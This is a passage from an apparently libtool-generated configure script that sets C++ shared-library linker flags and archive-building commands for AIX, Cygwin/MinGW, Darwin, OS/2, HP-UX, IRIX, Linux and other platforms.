aix[4-9]*) if test ia64 = "$host_cpu"; then # On IA64, the linker does run time linking by default, so we don't # have to do anything special. aix_use_runtimelinking=no exp_sym_flag='-Bexport' no_entry_flag= else aix_use_runtimelinking=no # Test if we are trying to use run time linking or normal # AIX style linking. If -brtl is somewhere in LDFLAGS, we # have runtime linking enabled, and use it for executables. # For shared libraries, we enable/disable runtime linking # depending on the kind of the shared library created - # when "with_aix_soname,aix_use_runtimelinking" is: # "aix,no" lib.a(lib.so.V) shared, rtl:no, for executables # "aix,yes" lib.so shared, rtl:yes, for executables # lib.a static archive # "both,no" lib.so.V(shr.o) shared, rtl:yes # lib.a(lib.so.V) shared, rtl:no, for executables # "both,yes" lib.so.V(shr.o) shared, rtl:yes, for executables # lib.a(lib.so.V) shared, rtl:no # "svr4,*" lib.so.V(shr.o) shared, rtl:yes, for executables # lib.a static archive case $host_os in aix4.[23]|aix4.[23].*|aix[5-9]*) for ld_flag in $LDFLAGS; do case $ld_flag in *-brtl*) aix_use_runtimelinking=yes break ;; esac done if test svr4,no = "$with_aix_soname,$aix_use_runtimelinking"; then # With aix-soname=svr4, we create the lib.so.V shared archives only, # so we don't have lib.a shared libs to link our executables. # We have to force runtime linking in this case. aix_use_runtimelinking=yes LDFLAGS="$LDFLAGS -Wl,-brtl" fi ;; esac exp_sym_flag='-bexport' no_entry_flag='-bnoentry' fi # When large executables or shared objects are built, AIX ld can # have problems creating the table of contents. If linking a library # or program results in "error TOC overflow" add -mminimal-toc to # CXXFLAGS/CFLAGS for g++/gcc. In the cases where that is not # enough to fix the problem, add -Wl,-bbigtoc to LDFLAGS. archive_cmds_CXX='' hardcode_direct_CXX=yes hardcode_direct_absolute_CXX=yes hardcode_libdir_separator_CXX=':' link_all_deplibs_CXX=yes file_list_spec_CXX='$wl-f,' case $with_aix_soname,$aix_use_runtimelinking in aix,*) ;; # no import file svr4,* | *,yes) # use import file # The Import File defines what to hardcode. hardcode_direct_CXX=no hardcode_direct_absolute_CXX=no ;; esac if test yes = "$GXX"; then case $host_os in aix4.[012]|aix4.[012].*) # We only want to do this on AIX 4.2 and lower, the check # below for broken collect2 doesn't work under 4.3+ collect2name=`$CC -print-prog-name=collect2` if test -f "$collect2name" && strings "$collect2name" | $GREP resolve_lib_name >/dev/null then # We have reworked collect2 : else # We have old collect2 hardcode_direct_CXX=unsupported # It fails to find uninstalled libraries when the uninstalled # path is not listed in the libpath. Setting hardcode_minus_L # to unsupported forces relinking hardcode_minus_L_CXX=yes hardcode_libdir_flag_spec_CXX='-L$libdir' hardcode_libdir_separator_CXX= fi esac shared_flag='-shared' if test yes = "$aix_use_runtimelinking"; then shared_flag=$shared_flag' $wl-G' fi # Need to ensure runtime linking is disabled for the traditional # shared library, or the linker may eventually find shared libraries # /with/ Import File - we do not want to mix them. shared_flag_aix='-shared' shared_flag_svr4='-shared $wl-G' else # not using gcc if test ia64 = "$host_cpu"; then # VisualAge C++, Version 5.5 for AIX 5L for IA-64, Beta 3 Release # chokes on -Wl,-G. The following line is correct: shared_flag='-G' else if test yes = "$aix_use_runtimelinking"; then shared_flag='$wl-G' else shared_flag='$wl-bM:SRE' fi shared_flag_aix='$wl-bM:SRE' shared_flag_svr4='$wl-G' fi fi export_dynamic_flag_spec_CXX='$wl-bexpall' # It seems that -bexpall does not export symbols beginning with # underscore (_), so it is better to generate a list of symbols to # export. always_export_symbols_CXX=yes if test aix,yes = "$with_aix_soname,$aix_use_runtimelinking"; then # Warning - without using the other runtime loading flags (-brtl), # -berok will link without error, but may produce a broken library. # The "-G" linker flag allows undefined symbols. no_undefined_flag_CXX='-bernotok' # Determine the default libpath from the value encoded in an empty # executable. if test set = "${lt_cv_aix_libpath+set}"; then aix_libpath=$lt_cv_aix_libpath else if ${lt_cv_aix_libpath__CXX+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_cxx_try_link "$LINENO"; then : lt_aix_libpath_sed=' /Import File Strings/,/^$/ { /^0/ { s/^0 *\([^ ]*\) *$/\1/ p } }' lt_cv_aix_libpath__CXX=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` # Check for a 64-bit object if we didn't find anything. if test -z "$lt_cv_aix_libpath__CXX"; then lt_cv_aix_libpath__CXX=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` fi fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext if test -z "$lt_cv_aix_libpath__CXX"; then lt_cv_aix_libpath__CXX=/usr/lib:/lib fi fi aix_libpath=$lt_cv_aix_libpath__CXX fi hardcode_libdir_flag_spec_CXX='$wl-blibpath:$libdir:'"$aix_libpath" archive_expsym_cmds_CXX='$CC -o $output_objdir/$soname $libobjs $deplibs $wl'$no_entry_flag' $compiler_flags `if test -n "$allow_undefined_flag"; then func_echo_all "$wl$allow_undefined_flag"; else :; fi` $wl'$exp_sym_flag:\$export_symbols' '$shared_flag else if test ia64 = "$host_cpu"; then hardcode_libdir_flag_spec_CXX='$wl-R $libdir:/usr/lib:/lib' allow_undefined_flag_CXX="-z nodefs" archive_expsym_cmds_CXX="\$CC $shared_flag"' -o $output_objdir/$soname $libobjs $deplibs '"\$wl$no_entry_flag"' $compiler_flags $wl$allow_undefined_flag '"\$wl$exp_sym_flag:\$export_symbols" else # Determine the default libpath from the value encoded in an # empty executable. if test set = "${lt_cv_aix_libpath+set}"; then aix_libpath=$lt_cv_aix_libpath else if ${lt_cv_aix_libpath__CXX+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_cxx_try_link "$LINENO"; then : lt_aix_libpath_sed=' /Import File Strings/,/^$/ { /^0/ { s/^0 *\([^ ]*\) *$/\1/ p } }' lt_cv_aix_libpath__CXX=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` # Check for a 64-bit object if we didn't find anything. if test -z "$lt_cv_aix_libpath__CXX"; then lt_cv_aix_libpath__CXX=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` fi fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext if test -z "$lt_cv_aix_libpath__CXX"; then lt_cv_aix_libpath__CXX=/usr/lib:/lib fi fi aix_libpath=$lt_cv_aix_libpath__CXX fi hardcode_libdir_flag_spec_CXX='$wl-blibpath:$libdir:'"$aix_libpath" # Warning - without using the other run time loading flags, # -berok will link without error, but may produce a broken library. no_undefined_flag_CXX=' $wl-bernotok' allow_undefined_flag_CXX=' $wl-berok' if test yes = "$with_gnu_ld"; then # We only use this code for GNU lds that support --whole-archive. whole_archive_flag_spec_CXX='$wl--whole-archive$convenience $wl--no-whole-archive' else # Exported symbols can be pulled into shared objects from archives whole_archive_flag_spec_CXX='$convenience' fi archive_cmds_need_lc_CXX=yes archive_expsym_cmds_CXX='$RM -r $output_objdir/$realname.d~$MKDIR $output_objdir/$realname.d' # -brtl affects multiple linker settings, -berok does not and is overridden later compiler_flags_filtered='`func_echo_all "$compiler_flags " | $SED -e "s%-brtl\\([, ]\\)%-berok\\1%g"`' if test svr4 != "$with_aix_soname"; then # This is similar to how AIX traditionally builds its shared # libraries. Need -bnortl late, we may have -brtl in LDFLAGS. archive_expsym_cmds_CXX="$archive_expsym_cmds_CXX"'~$CC '$shared_flag_aix' -o $output_objdir/$realname.d/$soname $libobjs $deplibs $wl-bnoentry '$compiler_flags_filtered'$wl-bE:$export_symbols$allow_undefined_flag~$AR $AR_FLAGS $output_objdir/$libname$release.a $output_objdir/$realname.d/$soname' fi if test aix != "$with_aix_soname"; then archive_expsym_cmds_CXX="$archive_expsym_cmds_CXX"'~$CC '$shared_flag_svr4' -o $output_objdir/$realname.d/$shared_archive_member_spec.o $libobjs $deplibs $wl-bnoentry '$compiler_flags_filtered'$wl-bE:$export_symbols$allow_undefined_flag~$STRIP -e $output_objdir/$realname.d/$shared_archive_member_spec.o~( func_echo_all "#! $soname($shared_archive_member_spec.o)"; if test shr_64 = "$shared_archive_member_spec"; then func_echo_all "# 64"; else func_echo_all "# 32"; fi; cat $export_symbols ) > $output_objdir/$realname.d/$shared_archive_member_spec.imp~$AR $AR_FLAGS $output_objdir/$soname $output_objdir/$realname.d/$shared_archive_member_spec.o $output_objdir/$realname.d/$shared_archive_member_spec.imp' else # used by -dlpreopen to get the symbols archive_expsym_cmds_CXX="$archive_expsym_cmds_CXX"'~$MV $output_objdir/$realname.d/$soname $output_objdir' fi archive_expsym_cmds_CXX="$archive_expsym_cmds_CXX"'~$RM -r $output_objdir/$realname.d' fi fi ;; beos*) if $LD --help 2>&1 | $GREP ': supported targets:.* elf' > /dev/null; then allow_undefined_flag_CXX=unsupported # Joseph Beckenbach says some releases of gcc # support --undefined. This deserves some investigation. FIXME archive_cmds_CXX='$CC -nostart $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' else ld_shlibs_CXX=no fi ;; chorus*) case $cc_basename in *) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; esac ;; cygwin* | mingw* | pw32* | cegcc*) case $GXX,$cc_basename in ,cl* | no,cl* | ,icl* | no,icl*) # Native MSVC or ICC # hardcode_libdir_flag_spec is actually meaningless, as there is # no search path for DLLs. hardcode_libdir_flag_spec_CXX=' ' allow_undefined_flag_CXX=unsupported always_export_symbols_CXX=yes file_list_spec_CXX='@' # Tell ltmain to make .lib files, not .a files. libext=lib # Tell ltmain to make .dll files, not .so files. shrext_cmds=.dll # FIXME: Setting linknames here is a bad hack. archive_cmds_CXX='$CC -o $output_objdir/$soname $libobjs $compiler_flags $deplibs -Wl,-DLL,-IMPLIB:"$tool_output_objdir$libname.dll.lib"~linknames=' archive_expsym_cmds_CXX='if test DEF = "`$SED -n -e '\''s/^[ ]*//'\'' -e '\''/^\(;.*\)*$/d'\'' -e '\''s/^\(EXPORTS\|LIBRARY\)\([ ].*\)*$/DEF/p'\'' -e q $export_symbols`" ; then cp "$export_symbols" "$output_objdir/$soname.def"; echo "$tool_output_objdir$soname.def" > "$output_objdir/$soname.exp"; else $SED -e '\''s/^/-link -EXPORT:/'\'' < $export_symbols > $output_objdir/$soname.exp; fi~ $CC -o $tool_output_objdir$soname $libobjs $compiler_flags $deplibs "@$tool_output_objdir$soname.exp" -Wl,-DLL,-IMPLIB:"$tool_output_objdir$libname.dll.lib"~ linknames=' # The linker will not automatically build a static lib if we build a DLL. # _LT_TAGVAR(old_archive_from_new_cmds, CXX)='true' enable_shared_with_static_runtimes_CXX=yes # Don't use ranlib old_postinstall_cmds_CXX='chmod 644 $oldlib' postlink_cmds_CXX='lt_outputfile="@OUTPUT@"~ lt_tool_outputfile="@TOOL_OUTPUT@"~ case $lt_outputfile in *.exe|*.EXE) ;; *) lt_outputfile=$lt_outputfile.exe lt_tool_outputfile=$lt_tool_outputfile.exe ;; esac~ func_to_tool_file "$lt_outputfile"~ if test : != "$MANIFEST_TOOL" && test -f "$lt_outputfile.manifest"; then $MANIFEST_TOOL -manifest "$lt_tool_outputfile.manifest" -outputresource:"$lt_tool_outputfile" || exit 1; $RM "$lt_outputfile.manifest"; fi' ;; *) # g++ # _LT_TAGVAR(hardcode_libdir_flag_spec, CXX) is actually meaningless, # as there is no search path for DLLs. hardcode_libdir_flag_spec_CXX='-L$libdir' export_dynamic_flag_spec_CXX='$wl--export-all-symbols' allow_undefined_flag_CXX=unsupported always_export_symbols_CXX=no enable_shared_with_static_runtimes_CXX=yes if $LD --help 2>&1 | $GREP 'auto-import' > /dev/null; then archive_cmds_CXX='$CC -shared -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -o $output_objdir/$soname $wl--enable-auto-image-base -Xlinker --out-implib -Xlinker $lib' # If the export-symbols file already is a .def file, use it as # is; otherwise, prepend EXPORTS... archive_expsym_cmds_CXX='if test DEF = "`$SED -n -e '\''s/^[ ]*//'\'' -e '\''/^\(;.*\)*$/d'\'' -e '\''s/^\(EXPORTS\|LIBRARY\)\([ ].*\)*$/DEF/p'\'' -e q $export_symbols`" ; then cp $export_symbols $output_objdir/$soname.def; else echo EXPORTS > $output_objdir/$soname.def; cat $export_symbols >> $output_objdir/$soname.def; fi~ $CC -shared -nostdlib $output_objdir/$soname.def $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -o $output_objdir/$soname $wl--enable-auto-image-base -Xlinker --out-implib -Xlinker $lib' else ld_shlibs_CXX=no fi ;; esac ;; darwin* | rhapsody*) archive_cmds_need_lc_CXX=no hardcode_direct_CXX=no hardcode_automatic_CXX=yes hardcode_shlibpath_var_CXX=unsupported if test yes = "$lt_cv_ld_force_load"; then whole_archive_flag_spec_CXX='`for conv in $convenience\"\"; do test -n \"$conv\" && new_convenience=\"$new_convenience $wl-force_load,$conv\"; done; func_echo_all \"$new_convenience\"`' else whole_archive_flag_spec_CXX='' fi link_all_deplibs_CXX=yes allow_undefined_flag_CXX=$_lt_dar_allow_undefined case $cc_basename in ifort*|nagfor*) _lt_dar_can_shared=yes ;; *) _lt_dar_can_shared=$GCC ;; esac if test yes = "$_lt_dar_can_shared"; then output_verbose_link_cmd=func_echo_all archive_cmds_CXX="\$CC -dynamiclib \$allow_undefined_flag -o \$lib \$libobjs \$deplibs \$compiler_flags -install_name \$rpath/\$soname \$verstring $_lt_dar_single_mod$_lt_dsymutil" module_cmds_CXX="\$CC \$allow_undefined_flag -o \$lib -bundle \$libobjs \$deplibs \$compiler_flags$_lt_dsymutil" archive_expsym_cmds_CXX="sed 's|^|_|' < \$export_symbols > \$output_objdir/\$libname-symbols.expsym~\$CC -dynamiclib \$allow_undefined_flag -o \$lib \$libobjs \$deplibs \$compiler_flags -install_name \$rpath/\$soname \$verstring $_lt_dar_single_mod$_lt_dar_export_syms$_lt_dsymutil" module_expsym_cmds_CXX="sed -e 's|^|_|' < \$export_symbols > \$output_objdir/\$libname-symbols.expsym~\$CC \$allow_undefined_flag -o \$lib -bundle \$libobjs \$deplibs \$compiler_flags$_lt_dar_export_syms$_lt_dsymutil" if test yes != "$lt_cv_apple_cc_single_mod"; then archive_cmds_CXX="\$CC -r -keep_private_externs -nostdlib -o \$lib-master.o \$libobjs~\$CC -dynamiclib \$allow_undefined_flag -o \$lib \$lib-master.o \$deplibs \$compiler_flags -install_name \$rpath/\$soname \$verstring$_lt_dsymutil" archive_expsym_cmds_CXX="sed 's|^|_|' < \$export_symbols > \$output_objdir/\$libname-symbols.expsym~\$CC -r -keep_private_externs -nostdlib -o \$lib-master.o \$libobjs~\$CC -dynamiclib \$allow_undefined_flag -o \$lib \$lib-master.o \$deplibs \$compiler_flags -install_name \$rpath/\$soname \$verstring$_lt_dar_export_syms$_lt_dsymutil" fi else ld_shlibs_CXX=no fi ;; os2*) hardcode_libdir_flag_spec_CXX='-L$libdir' hardcode_minus_L_CXX=yes allow_undefined_flag_CXX=unsupported shrext_cmds=.dll archive_cmds_CXX='$ECHO "LIBRARY ${soname%$shared_ext} INITINSTANCE TERMINSTANCE" > $output_objdir/$libname.def~ $ECHO "DESCRIPTION \"$libname\"" >> $output_objdir/$libname.def~ $ECHO "DATA MULTIPLE NONSHARED" >> $output_objdir/$libname.def~ $ECHO EXPORTS >> $output_objdir/$libname.def~ emxexp $libobjs | $SED /"_DLL_InitTerm"/d >> $output_objdir/$libname.def~ $CC -Zdll -Zcrtdll -o $output_objdir/$soname $libobjs $deplibs $compiler_flags $output_objdir/$libname.def~ emximp -o $lib $output_objdir/$libname.def' archive_expsym_cmds_CXX='$ECHO "LIBRARY ${soname%$shared_ext} INITINSTANCE TERMINSTANCE" > $output_objdir/$libname.def~ $ECHO "DESCRIPTION \"$libname\"" >> $output_objdir/$libname.def~ $ECHO "DATA MULTIPLE NONSHARED" >> $output_objdir/$libname.def~ $ECHO EXPORTS >> $output_objdir/$libname.def~ prefix_cmds="$SED"~ if test EXPORTS = "`$SED 1q $export_symbols`"; then prefix_cmds="$prefix_cmds -e 1d"; fi~ prefix_cmds="$prefix_cmds -e \"s/^\(.*\)$/_\1/g\""~ cat $export_symbols | $prefix_cmds >> $output_objdir/$libname.def~ $CC -Zdll -Zcrtdll -o $output_objdir/$soname $libobjs $deplibs $compiler_flags $output_objdir/$libname.def~ emximp -o $lib $output_objdir/$libname.def' old_archive_From_new_cmds_CXX='emximp -o $output_objdir/${libname}_dll.a $output_objdir/$libname.def' enable_shared_with_static_runtimes_CXX=yes file_list_spec_CXX='@' ;; dgux*) case $cc_basename in ec++*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; ghcx*) # Green Hills C++ Compiler # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; *) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; esac ;; freebsd2.*) # C++ shared libraries reported to be fairly broken before # switch to ELF ld_shlibs_CXX=no ;; freebsd-elf*) archive_cmds_need_lc_CXX=no ;; freebsd* | dragonfly*) # FreeBSD 3 and later use GNU C++ and GNU ld with standard ELF # conventions ld_shlibs_CXX=yes ;; haiku*) archive_cmds_CXX='$CC -shared $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' link_all_deplibs_CXX=yes ;; hpux9*) hardcode_libdir_flag_spec_CXX='$wl+b $wl$libdir' hardcode_libdir_separator_CXX=: export_dynamic_flag_spec_CXX='$wl-E' hardcode_direct_CXX=yes hardcode_minus_L_CXX=yes # Not in the search PATH, # but as the default # location of the library. case $cc_basename in CC*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; aCC*) archive_cmds_CXX='$RM $output_objdir/$soname~$CC -b $wl+b $wl$install_libdir -o $output_objdir/$soname $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags~test "x$output_objdir/$soname" = "x$lib" || mv $output_objdir/$soname $lib' # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. # # There doesn't appear to be a way to prevent this compiler from # explicitly linking system object files so we need to strip them # from the output so that they don't get included in the library # dependencies. output_verbose_link_cmd='templist=`($CC -b $CFLAGS -v conftest.$objext 2>&1) | $EGREP "\-L"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"' ;; *) if test yes = "$GXX"; then archive_cmds_CXX='$RM $output_objdir/$soname~$CC -shared -nostdlib $pic_flag $wl+b $wl$install_libdir -o $output_objdir/$soname $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags~test "x$output_objdir/$soname" = "x$lib" || mv $output_objdir/$soname $lib' else # FIXME: insert proper C++ library support ld_shlibs_CXX=no fi ;; esac ;; hpux10*|hpux11*) if test no = "$with_gnu_ld"; then hardcode_libdir_flag_spec_CXX='$wl+b $wl$libdir' hardcode_libdir_separator_CXX=: case $host_cpu in hppa*64*|ia64*) ;; *) export_dynamic_flag_spec_CXX='$wl-E' ;; esac fi case $host_cpu in hppa*64*|ia64*) hardcode_direct_CXX=no hardcode_shlibpath_var_CXX=no ;; *) hardcode_direct_CXX=yes hardcode_direct_absolute_CXX=yes hardcode_minus_L_CXX=yes # Not in the search PATH, # but as the default # location of the library. ;; esac case $cc_basename in CC*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; aCC*) case $host_cpu in hppa*64*) archive_cmds_CXX='$CC -b $wl+h $wl$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' ;; ia64*) archive_cmds_CXX='$CC -b $wl+h $wl$soname $wl+nodefaultrpath -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' ;; *) archive_cmds_CXX='$CC -b $wl+h $wl$soname $wl+b $wl$install_libdir -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' ;; esac # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. # # There doesn't appear to be a way to prevent this compiler from # explicitly linking system object files so we need to strip them # from the output so that they don't get included in the library # dependencies. output_verbose_link_cmd='templist=`($CC -b $CFLAGS -v conftest.$objext 2>&1) | $GREP "\-L"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"' ;; *) if test yes = "$GXX"; then if test no = "$with_gnu_ld"; then case $host_cpu in hppa*64*) archive_cmds_CXX='$CC -shared -nostdlib -fPIC $wl+h $wl$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' ;; ia64*) archive_cmds_CXX='$CC -shared -nostdlib $pic_flag $wl+h $wl$soname $wl+nodefaultrpath -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' ;; *) archive_cmds_CXX='$CC -shared -nostdlib $pic_flag $wl+h $wl$soname $wl+b $wl$install_libdir -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' ;; esac fi else # FIXME: insert proper C++ library support ld_shlibs_CXX=no fi ;; esac ;; interix[3-9]*) hardcode_direct_CXX=no hardcode_shlibpath_var_CXX=no hardcode_libdir_flag_spec_CXX='$wl-rpath,$libdir' export_dynamic_flag_spec_CXX='$wl-E' # Hack: On Interix 3.x, we cannot compile PIC because of a broken gcc. # Instead, shared libraries are loaded at an image base (0x10000000 by # default) and relocated if they conflict, which is a slow very memory # consuming and fragmenting process. To avoid this, we pick a random, # 256 KiB-aligned image base between 0x50000000 and 0x6FFC0000 at link # time. Moving up from 0x10000000 also allows more sbrk(2) space. archive_cmds_CXX='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib' archive_expsym_cmds_CXX='sed "s|^|_|" $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--retain-symbols-file,$output_objdir/$soname.expsym $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib' ;; irix5* | irix6*) case $cc_basename in CC*) # SGI C++ archive_cmds_CXX='$CC -shared -all -multigot $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib' # Archives containing C++ object files must be created using # "CC -ar", where "CC" is the IRIX C++ compiler. This is # necessary to make sure instantiated templates are included # in the archive. old_archive_cmds_CXX='$CC -ar -WR,-u -o $oldlib $oldobjs' ;; *) if test yes = "$GXX"; then if test no = "$with_gnu_ld"; then archive_cmds_CXX='$CC -shared $pic_flag -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib' else archive_cmds_CXX='$CC -shared $pic_flag -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` -o $lib' fi fi link_all_deplibs_CXX=yes ;; esac hardcode_libdir_flag_spec_CXX='$wl-rpath $wl$libdir' hardcode_libdir_separator_CXX=: inherit_rpath_CXX=yes ;; linux* | k*bsd*-gnu | kopensolaris*-gnu | gnu*) case $cc_basename in KCC*) # Kuck and Associates, Inc. (KAI) C++ Compiler # KCC will only create a shared library if the output file # ends with ".so" (or ".sl" for HP-UX), so rename the library # to its proper name (with version) after linking. archive_cmds_CXX='tempext=`echo $shared_ext | $SED -e '\''s/\([^()0-9A-Za-z{}]\)/\\\\\1/g'\''`; templib=`echo $lib | $SED -e "s/\$tempext\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib; mv \$templib $lib' archive_expsym_cmds_CXX='tempext=`echo $shared_ext | $SED -e '\''s/\([^()0-9A-Za-z{}]\)/\\\\\1/g'\''`; templib=`echo $lib | $SED -e "s/\$tempext\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib $wl-retain-symbols-file,$export_symbols; mv \$templib $lib' # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. # # There doesn't appear to be a way to prevent this compiler from # explicitly linking system object files so we need to strip them # from the output so that they don't get included in the library # dependencies. output_verbose_link_cmd='templist=`$CC $CFLAGS -v conftest.$objext -o libconftest$shared_ext 2>&1 | $GREP "ld"`; rm -f libconftest$shared_ext; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"' hardcode_libdir_flag_spec_CXX='$wl-rpath,$libdir' export_dynamic_flag_spec_CXX='$wl--export-dynamic' # Archives containing C++ object files must be created using # "CC -Bstatic", where "CC" is the KAI C++ compiler. old_archive_cmds_CXX='$CC -Bstatic -o $oldlib $oldobjs' ;; icpc* | ecpc* ) # Intel C++ with_gnu_ld=yes # version 8.0 and above of icpc choke on multiply defined symbols # if we add $predep_objects and $postdep_objects, however 7.1 and # earlier do not add the objects themselves. case `$CC -V 2>&1` in *"Version 7."*) archive_cmds_CXX='$CC -shared $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds_CXX='$CC -shared $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' ;; *) # Version 8.0 or newer tmp_idyn= case $host_cpu in ia64*) tmp_idyn=' -i_dynamic';; esac archive_cmds_CXX='$CC -shared'"$tmp_idyn"' $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds_CXX='$CC -shared'"$tmp_idyn"' $libobjs $deplibs $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' ;; esac archive_cmds_need_lc_CXX=no hardcode_libdir_flag_spec_CXX='$wl-rpath,$libdir' export_dynamic_flag_spec_CXX='$wl--export-dynamic' whole_archive_flag_spec_CXX='$wl--whole-archive$convenience $wl--no-whole-archive' ;; pgCC* | pgcpp*) # Portland Group C++ compiler case `$CC -V` in *pgCC\ [1-5].* | *pgcpp\ [1-5].*) prelink_cmds_CXX='tpldir=Template.dir~ rm -rf $tpldir~ $CC --prelink_objects --instantiation_dir $tpldir $objs $libobjs $compile_deplibs~ compile_command="$compile_command `find $tpldir -name \*.o | sort | $NL2SP`"' old_archive_cmds_CXX='tpldir=Template.dir~ rm -rf $tpldir~ $CC --prelink_objects --instantiation_dir $tpldir $oldobjs$old_deplibs~ $AR $AR_FLAGS $oldlib$oldobjs$old_deplibs `find $tpldir -name \*.o | sort | $NL2SP`~ $RANLIB $oldlib' archive_cmds_CXX='tpldir=Template.dir~ rm -rf $tpldir~ $CC --prelink_objects --instantiation_dir $tpldir $predep_objects $libobjs $deplibs $convenience $postdep_objects~ $CC -shared $pic_flag $predep_objects $libobjs $deplibs `find $tpldir -name \*.o | sort | $NL2SP` $postdep_objects $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds_CXX='tpldir=Template.dir~ rm -rf $tpldir~ $CC --prelink_objects --instantiation_dir $tpldir $predep_objects $libobjs $deplibs $convenience $postdep_objects~ $CC -shared $pic_flag $predep_objects $libobjs $deplibs `find $tpldir -name \*.o | sort | $NL2SP` $postdep_objects $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' ;; *) # Version 6 and above use weak symbols archive_cmds_CXX='$CC -shared $pic_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds_CXX='$CC -shared $pic_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' ;; esac hardcode_libdir_flag_spec_CXX='$wl--rpath $wl$libdir' export_dynamic_flag_spec_CXX='$wl--export-dynamic' whole_archive_flag_spec_CXX='$wl--whole-archive`for conv in $convenience\"\"; do test -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive' ;; cxx*) # Compaq C++ archive_cmds_CXX='$CC -shared $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds_CXX='$CC -shared $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname -o $lib $wl-retain-symbols-file $wl$export_symbols' runpath_var=LD_RUN_PATH hardcode_libdir_flag_spec_CXX='-rpath $libdir' hardcode_libdir_separator_CXX=: # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. # # There doesn't appear to be a way to prevent this compiler from # explicitly linking system object files so we need to strip them # from the output so that they don't get included in the library # dependencies. output_verbose_link_cmd='templist=`$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP "ld"`; templist=`func_echo_all "$templist" | $SED "s/\(^.*ld.*\)\( .*ld .*$\)/\1/"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "X$list" | $Xsed' ;; xl* | mpixl* | bgxl*) # IBM XL 8.0 on PPC, with GNU ld hardcode_libdir_flag_spec_CXX='$wl-rpath $wl$libdir' export_dynamic_flag_spec_CXX='$wl--export-dynamic' archive_cmds_CXX='$CC -qmkshrobj $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' if test yes = "$supports_anon_versioning"; then archive_expsym_cmds_CXX='echo "{ global:" > 